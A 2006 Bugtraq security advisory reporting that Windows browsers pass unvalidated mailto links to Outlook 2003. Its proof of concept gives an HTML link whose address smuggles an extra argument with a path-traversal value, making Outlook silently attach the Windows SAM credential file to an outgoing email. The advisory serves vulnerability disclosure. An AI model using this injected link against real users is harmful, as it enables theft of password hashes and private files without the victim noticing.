Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit
From: inge.henriksen@xxxxxxxxxxxxxxx
Date: 24 Apr 2006 15:55:36 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

** Inge Henriksen Security Advisory http://ingehenriksen.blogspot.com/ **

Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file 
attachment exploit

Release Date: Not released

Tested and Confirmed Vulerable: 
Micrsoft Outlook 2003 SP 1
Microsoft Internet Explorer 6 SP2
Mozilla Firefox 1.06
Avant Browser 10.1 Build 17

Severity: Low

Type: Stealing files

>From where: Remote

Discovered by: 
Inge Henriksen (inge.henriksen@xxxxxxxxxxxxxxx) 
http://ingehenriksen.blogspot.com/

Vendor Status: Not notified

Overview:
Application protocols handling in Microsoft Windows is badly designed, i.e. 
when someone types 
mailto:someone@xxxxxxxxxxxxx into a browser the protocol is first looked up 
under
HKEY_CLASSES_ROOT\%protocol%\shell\open\command, if it is a protocol that is 
allowed under the
current user context then the value is simply replaced by the contents in the 
address bar at %1. In
our example 

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "%1"

would become

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m 
"mailto:someone@xxxxxxxxxxxxx";

There is absolutely no input validation in all the browsers I have tested, i.e. 
there are exploits
availible by entering more data into the address bar than was intended. 

Proof-of Concept:

The mailto application protocol can be axploited by entering 
<email>""<filepath>, this will cause
OUTLOOK.EXE to attach the file <filepath> to the email without asking for 
permission, thus opening
up for sensitive files to be stolen when a user sends an email it is fair to 
believe that many
people would not notice the attached file before sending the email.

To attach the SAM file to a email a html file could contain this:

<a href='mailto:someone@xxxxxxxxxxxxx""..\..\..\..\..\windows\REPAIR\SAM'>Click 
here to email me</a>

The command being run would now be:

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m 
"mailto:someone@xxxxxxxxxxxxx""..\..\..\..\..\windows\REPAIR\SAM";

, thus attaching the SAM file.

Prev by Date: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
Next by Date: Multiple vulnerabilities in IP3 Networks 'NetAccess' NA75 appliance
Previous by thread: PowerPoint Phishing Trojan
Next by thread: Multiple vulnerabilities in IP3 Networks 'NetAccess' NA75 appliance
Index(es):
- Date
- Thread